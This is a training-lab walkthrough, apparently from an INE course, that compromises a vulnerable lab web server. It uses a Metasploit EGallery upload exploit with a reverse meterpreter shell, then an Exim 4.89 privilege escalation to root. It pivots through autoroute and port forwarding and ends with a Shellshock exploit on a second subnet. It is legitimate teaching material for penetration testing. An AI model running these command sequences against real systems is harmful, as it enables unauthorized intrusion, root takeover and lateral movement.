Linux Exploitation: Lab 3 - Remote Exploitation and Post Exploitation

overview

You will learn to find and exploit a vulnerable web application in this lab. It will also cover post-exploitation techniques to extract sensitive information and pivot!

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable application can be accessed using the tools installed on Kali at http://demo.ine.local

Objective: Exploit both the target and find all flags!

Tools

The best tools for this lab are:

Metasploit Framework
Nmap
Bash Shell

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!

Solution

Step 1: Open the lab link to access the Kali GUI instance.

Content Image

Step 2: Check if the provided machine/domain is reachable.

Commands

ping demo.ine.local

Content Image

The machine is reachable.

Step 3: Check open ports on the demo.ine.local machine.

Command

nmap demo.ine.local

Content Image

We can observe ports 80 and 25 open on the demo.ine.local machine.

Let's find the running application name and version on both ports.

Step 4: Running the Nmap on ports 80 and 25 to find all possible information about the target server.

Command

nmap -sV -p 80,25 demo.ine.local

-sV: Probe open ports to determine service/version info.

-p: Port

Content Image

Target is running Apache httpd 2.4.7 and Exim smtpd 4.89.

We have found both the service's name and a specific version. This is crucial information we have obtained.

Now, let's find what is running on the Apache webserver.

Step 5: Let's use firefox browser and access the target server, i.e demo.ine.local

Content Image

Target is running the EGallery web application. However, we do not know the specific version of this application.

Step 6: We will search for the public exploit of the EGallery application using searchsploit.

Command

searchsploit EGallery

About "searchsploit"

searchsploit is a bash script that helps find exploits for services, OSes, and applications.

Content Image

We have received an output stating a Metasploit module available for the EGallery application.

Step 7: We will run the EGallery Arbitrary '.PHP' File Upload exploit module to gain the meterpreter session.

Commands

msfconsole -q
search egallery

Content Image

There is a Metasploit exploit module available for the EGallery.

We have successfully identified the running application and found the exploit module.

Step 8: Let's use the exploit module and check all the available options.

Commands

use exploit/unix/webapp/egallery_upload_exec
show options

Content Image

We need to set "RHOSTS" (A target Machine Address: IP or URL). In this case, it is demo.ine.local where the EGallery application is running.

Port 80 is by-default mentioned in the module, also php/meterpreter/reverse_tcp payload is set along with "LHOST" and "LPORT" (Local Machine IP Address and Port) for reverse connection of the meterpreter shell.

Also, the TARGETURI is set to /sample.

But the application is running on the root path of the webserver. So, we also need to change that value to /

In our case, the LHOST value is not valid. We also need to change that.

Note: Always make sure about LHOST and LPORT values if they don't match your lab setup. And make sure to change if required.

Step 9: Now, set the target information, i.e. set RHOSTS and exploit the EGallery application

First, check the IP address of the attacker's machine.

Command

ip addr

Content Image

Now, use this IP for configuring the LHOST

Commands

set RHOSTS demo.ine.local
set LHOST 192.72.201.2
set TARGETURI /
exploit

Content Image

We have successfully exploited the EGallery app using the Metasploit framework.

Step 10: Now, we will discover target machine information, e.g., current user, system information, arch, etc.

Commands

sysinfo
getuid

Content Image

We notice that target is running a ubuntu server, and we have received a meterpreter session with www-data privileges.

Step 11: Let's read the flag.

Commands

ls
cat THIS_IS_FLAG5234234324/FLAG1

Content Image

We have found the FLAG1: e56938b6e91af44bc116b494384b579e

Step 12: The www-data is used by default for regular operation on ubuntu apache. So, all the processes associated with the webserver would run as www-data. This user doesn't have any extreme privileges, which could cause any damage to the system.

Remember, we have also discovered the Exim smtpd 4.89 service. Let's find the public exploit of the Exim smtpd 4.89 server using searchsploit.

Command

searchsploit exim 4.89

Content Image

Great! We can notice that Exim 4.89 is vulnerable to the local exploit, i.e., privilege escalation.

Step 13: Let's find the Metasploit module for Exim 4.89 and use the suitable local exploit module for privilege escalation.

Command

background
search exim4

Content Image

There is a Metasploit module present for Exim 4.87 to 4.91 versions. Let's use it and gain the root privileges.

We will use the module and check all available options.

Commands

use exploit/linux/local/exim4_deliver_message_priv_esc
show options

Content Image

We need to set SESSION (A meterpreter session ID). Then, in this case, also, the LHOST value is invalid. We will set the proper attacker machine IP address.

Also, payload is set to linux/x64/meterpreter/reverse_tcp. We will replace that with linux/x86/meterpreter/reverse_tcp payload.

Let's exploit it.

Commands

set SESSION 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.72.201.2
exploit
getuid

Content Image

Success! We have received a new meterpreter session with the root privileges.

Step 14: Let's read the second flag.

Commands

ls /root
cat /root/FLAG2

Content Image

We have found the FLAG2: 79ff114680e11e44a71d773068485a9e

We have successfully compromised the demo.ine.local and found both the flag. We need to find one more host which is running on another subnet.

Step 15: Now, let's check the details of all interfaces on the target host.

Command

ipconfig

Content Image

We found two interfaces attached to target demo.ine.local. We can add the route for the second subnet, i.e., 192.161.244.2, and scan for the live hosts and open ports.

Note: In your case, the IP range would differ. Please make sure about it.

Let's add the route.

Command

run autoroute -s 192.161.244.0/24

Content Image

We have successfully added the route. Now, let's scan the first 5 hosts using the auxiliary port scanner module.

Commands

background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.161.244.3-5
run

Content Image

We notice that TCP port 80 is open on the second target machine. Next, let's forward the port and run the nmap on them to identify the running services. We will forward remote port 80 to port 1234.

Commands

sessions -i 2
portfwd add -l 1234 -p 80 -r 192.161.244.3
portfwd list

Content Image

We have forwarded the port. Now, let's run nmap and identify the running service.

Commands

background
nmap -sV -p 1234 localhost

Content Image

The target is running Apache httpd 2.2.22. Let's use the firefox browser and access the webserver to identify what application is running on it.

URL: http://localhost:1234

Content Image

Well, nothing interesting we have found on the target server. Let's check the web page source.

Right-click on the web page and select View Page Source.

Content Image

We can notice the HTML iframe and located the /cgi-bin/stats script path. Now, this could be a way to exploit the second target machine.

Step 16: Let's run the Apache mod_cgi Bash Environment Variable Injection scanner module to identify the vulnerability of shellshock.

About ShellShock Vulnerability, a.k.a CVE-2014-6271

Around mid-September 2014, the security community experienced a seemingly simple, yet nuanced bug in the popular shell interpreter bash. What's interesting is the fact that this bug had been introduced into the source code of bash in late 1989! It is an arbitrary code execution vulnerability and is quite easy to exploit - if the bash interpreter is passed a variable having a certain pattern (as we will see in the following manual), it ends up executing the supplied commands and leads to the code execution vulnerability - a holy grail for the attackers!

Use the auxiliary apache_mod_cgi_bash_env module and check all available options.

Commands

use auxiliary/scanner/http/apache_mod_cgi_bash_env
show options

Content Image

We can notice that all the values are correctly set. We just need to provide the TARGETURI and the RHOSTS values.

Let's configure the values and run the auxiliary module.

Commands

set RHOSTS 192.161.244.3
set TARGETURI /cgi-bin/stats
exploit

Content Image

Great! The target server is vulnerable to the ShellShock vulnerability.

Let's use the exploit module i.e exploit/multi/http/apache_mod_cgi_bash_env_exec and check all available options.

Commands

use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options

Content Image

We need to provide the TARGETURI and the RHOSTS values.

The PAYLOAD is not valid. The default payload is set to linux/x86/meterpreter/reverse_tcp

The 192.161.244.3 target is not accessible from the Kali machine, so we can't use the reverse_tcp payload. This is an essential step for us to choose the valid payload. In this case, we have to use the bind_tcp payload to gain the meterpreter session.

If we choose the reverse_tcp, the exploit would work but won't give us a meterpreter session.

Commands

set PAYLOAD linux/x86/meterpreter/bind_tcp
set RHOSTS 192.161.244.3
set TARGETURI /cgi-bin/stats
exploit
getuid

Content Image

Success! We have successfully exploited the second target machine!

PreviousMSSQL DB User Impersonation to RCE NextWindows: NTLM Hash Cracking

Last updated 10 months ago